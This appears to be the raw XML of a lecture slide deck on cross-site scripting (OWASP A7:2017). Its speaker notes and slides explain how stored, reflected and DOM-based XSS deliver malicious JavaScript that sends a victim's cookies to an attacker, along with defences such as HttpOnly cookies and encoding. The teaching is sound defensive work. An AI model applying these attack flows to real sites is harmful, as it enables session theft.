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7" r:id="rId2"/>
    <p:sldId id="514" r:id="rId3"/>
    <p:sldId id="633" r:id="rId4"/>
    <p:sldId id="561" r:id="rId5"/>
    <p:sldId id="599" r:id="rId6"/>
    <p:sldId id="600" r:id="rId7"/>
    <p:sldId id="601" r:id="rId8"/>
    <p:sldId id="602" r:id="rId9"/>
    <p:sldId id="631" r:id="rId10"/>
    <p:sldId id="632" r:id="rId11"/>
    <p:sldId id="555" r:id="rId12"/>
    <p:sldId id="603" r:id="rId13"/>
    <p:sldId id="604" r:id="rId14"/>
    <p:sldId id="605" r:id="rId15"/>
    <p:sldId id="606" r:id="rId16"/>
    <p:sldId id="634" r:id="rId17"/>
    <p:sldId id="607" r:id="rId18"/>
    <p:sldId id="608" r:id="rId19"/>
    <p:sldId id="635" r:id="rId20"/>
    <p:sldId id="609" r:id="rId21"/>
    <p:sldId id="636" r:id="rId22"/>
    <p:sldId id="637" r:id="rId23"/>
    <p:sldId id="610" r:id="rId24"/>
    <p:sldId id="612" r:id="rId25"/>
    <p:sldId id="638" r:id="rId26"/>
    <p:sldId id="639" r:id="rId27"/>
    <p:sldId id="556" r:id="rId28"/>
    <p:sldId id="640" r:id="rId29"/>
    <p:sldId id="616" r:id="rId30"/>
    <p:sldId id="615" r:id="rId31"/>
    <p:sldId id="641" r:id="rId32"/>
    <p:sldId id="617" r:id="rId33"/>
    <p:sldId id="618" r:id="rId34"/>
    <p:sldId id="619" r:id="rId35"/>
    <p:sldId id="620" r:id="rId36"/>
    <p:sldId id="621" r:id="rId37"/>
    <p:sldId id="642" r:id="rId38"/>
    <p:sldId id="643" r:id="rId39"/>
    <p:sldId id="644" r:id="rId40"/>
    <p:sldId id="645" r:id="rId41"/>
    <p:sldId id="646" r:id="rId42"/>
    <p:sldId id="625" r:id="rId43"/>
    <p:sldId id="649" r:id="rId44"/>
    <p:sldId id="650" r:id="rId45"/>
    <p:sldId id="648" r:id="rId46"/>
    <p:sldId id="626" r:id="rId47"/>
    <p:sldId id="627" r:id="rId48"/>
    <p:sldId id="628" r:id="rId49"/>
    <p:sldId id="652" r:id="rId50"/>
    <p:sldId id="653" r:id="rId51"/>
    <p:sldId id="651" r:id="rId52"/>
    <p:sldId id="654" r:id="rId53"/>
    <p:sldId id="655" r:id="rId54"/>
    <p:sldId id="656" r:id="rId55"/>
    <p:sldId id="657" r:id="rId56"/>
    <p:sldId id="658" r:id="rId57"/>
    <p:sldId id="659"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56" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-448" y="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3AAC35-B9EF-C846-98B4-63503093AC60}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/04/19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C0EF0F-C99A-AA4E-889C-CEF3D4388521}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27897935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10</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11</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12</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script assumes that the user comment only has text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13</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script assumes that the user comment only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>has text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14</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all, JavaScript runs in a very restricted environment that has extremely limited access to the user's files and operating system. In fact, you could open your browser's JavaScript console right now and execute any JavaScript you want, and you would be very unlikely to cause any damage to your computer.</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15</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all, JavaScript runs in a very restricted environment that has extremely limited access to the user's files and operating system. In fact, you could open your browser's JavaScript console right now and execute any JavaScript you want, and you would be very unlikely to cause any damage to your computer.</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16</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ability to execute arbitrary JavaScript in another user’s browser allows an attacker to perform the following types of attacks</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17</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first, the ability to execute JavaScript in the victim's browser might not seem particularly malicious. After all, JavaScript runs in a very restricted environment that has extremely limited access to the user's files and operating system. In fact, you could open your browser's JavaScript console right now and execute any JavaScript you want, and you would be very unlikely to cause any damage to your computer.</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18</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first, the ability to execute JavaScript in the victim's browser might not seem particularly malicious. After all, JavaScript runs in a very restricted environment that has extremely limited access to the user's files and operating system. In fact, you could open your browser's JavaScript console right now and execute any JavaScript you want, and you would be very unlikely to cause any damage to your computer.</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19</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first, the ability to execute JavaScript in the victim's browser might not seem particularly malicious. After all, JavaScript runs in a very restricted environment that has extremely limited access to the user's files and operating system. In fact, you could open your browser's JavaScript console right now and execute any JavaScript you want, and you would be very unlikely to cause any damage to your computer.</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20</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 HTTP only option is set for cookies the previous attack cannot be performed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21</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 HTTP only option is set for cookies the previous attack cannot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>be performed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22</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first, the ability to execute JavaScript in the victim's browser might not seem particularly malicious. After all, JavaScript runs in a very restricted environment that has extremely limited access to the user's files and operating system. In fact, you could open your browser's JavaScript console right now and execute any JavaScript you want, and you would be very unlikely to cause any damage to your computer.</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23</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credentials sent by the user can be seen on the receiving server</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24</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credentials sent by the user can be seen on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>receiving server</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25</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credentials sent by the user can be seen on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>receiving server</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26</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27</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28</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29</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3</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attacker uses one of the website's forms to insert a malicious string into the website's database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The victim requests a page from the website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The website includes the malicious string from the database in the response and sends it to the victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The victim's browser executes the malicious script inside the response, sending the victim's cookies to the attacker's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30</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attacker uses one of the website's forms to insert a malicious string into the website's database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The victim requests a page from the website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The website includes the malicious string from the database in the response and sends it to the victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The victim's browser executes the malicious script inside the response, sending the victim's cookies to the attacker's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31</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attacker crafts a URL containing a malicious string and sends it to the victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The victim is tricked by the attacker into requesting the URL from the website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The website includes the malicious string from the URL in the response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The victim's browser executes the malicious script inside the response, sending the victim's cookies to the attacker's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32</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33</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attacker crafts a URL containing a malicious string and sends it to the victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The victim is tricked by the attacker into requesting the URL from the website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The website receives the request, but does not include the malicious string in the response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The victim's browser executes the legitimate script inside the response, causing the malicious script to be inserted into the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The victim's browser executes the malicious script inserted into the page, sending the victim's cookies to the attacker's server.</a:t>
            </a:r>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34</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35</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36</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37</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38</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39</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types of cross-site scripting. I am going to give you one that is very prevalent. In this case an attacker is trying to steal your session cookie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40</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41</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42</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43</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44</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45</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Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and Validation depend on the same factors</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46</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47</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48</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49</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types of cross-site scripting. I am going to give you one that is very prevalent. In this case an attacker is trying to steal your session cookie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50</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51</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52</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53</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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> shortening services can mask the malicious string from users who might otherwise identify it.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54</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55</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56</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57</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6</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going to print the script that is going to be executed in the victim’s browser</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7</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going to print the script that is going to be executed in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>victim’s browser</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8</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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4135523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11/04/19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3912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11/04/19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22529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11/04/19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01597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11/04/19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54066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95A4175F-39A9-994F-AEF5-8EBA8423B573}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/04/19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34123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95A4175F-39A9-994F-AEF5-8EBA8423B573}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/04/19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73806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95A4175F-39A9-994F-AEF5-8EBA8423B573}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/04/19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557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95A4175F-39A9-994F-AEF5-8EBA8423B573}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/04/19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47209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4175F-39A9-994F-AEF5-8EBA8423B573}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/04/19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69286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5A4175F-39A9-994F-AEF5-8EBA8423B573}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/04/19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390309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5A4175F-39A9-994F-AEF5-8EBA8423B573}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/04/19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7117326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4175F-39A9-994F-AEF5-8EBA8423B573}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/04/19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EB6F4-192A-BE4A-A8F3-8CB85A20582D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="668161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en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>A7:2017 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42572512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x-none" b="1" dirty="0" smtClean="0"/>
              <a:t>What is Cross-site Scripting?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25076543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19-04-10 at 23.41.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150" y="484742"/>
            <a:ext cx="8959850" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screenshot 2019-03-28 at 08.33.4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50504"/>
            <a:ext cx="9144000" cy="4502440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="4460399"/>
            <a:ext cx="4727388" cy="478118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="20000"/>
            </a:srgbClr>
          </a:solid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2631599"/>
            <a:ext cx="4267200" cy="478118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="20000"/>
            </a:srgbClr>
          </a:solid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84150" y="6337609"/>
            <a:ext cx="8959850" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/images/7/72/OWASP_Top_10-2017_%28en%29.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pdf.pdfc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30300456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What is XSS?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1391357"/>
            <a:ext cx="8378371" cy="5139869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user’s browser.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The attacker does not directly target the victim but exploits a vulnerability in a website that the victim visits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The website is used to deliver malicious code to the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34513142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How is the Malicious Code Injected? (1/2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1391357"/>
            <a:ext cx="8378371" cy="4832093"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Malicious code (JavaScript) is injected in one of the pages that the victim downloads from the website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>This can happen if the website directly includes user input in its pages, because the attacker can then insert a string that will be treated as code by the victim’s browser.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screenshot 2019-04-10 at 21.52.3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391" y="4803774"/>
            <a:ext cx="4599067" cy="1419675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27343124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How is the Malicious Code Injected? (2/2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1391357"/>
            <a:ext cx="8378371" cy="3539431"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>When the user’s browser loads the page, it will execute whatever JavaScript code is contained inside the &lt;script&gt; tags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screenshot 2019-04-10 at 22.00.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883" y="2980265"/>
            <a:ext cx="3936546" cy="1557867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130367875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What is Malicious JavaScript?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1306692"/>
            <a:ext cx="8378371" cy="3939541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>At first the ability to execute JavaScript in the victim’s browser might not seem particularly malicious.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JavaScript has limited access to user’s files and operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21358287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What is Malicious JavaScript?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1306692"/>
            <a:ext cx="8378371" cy="7109638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>At first the ability to execute JavaScript in the victim’s browser might not seem particularly malicious.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JavaScript has limited access to user’s files and operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>However that is not totally true </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
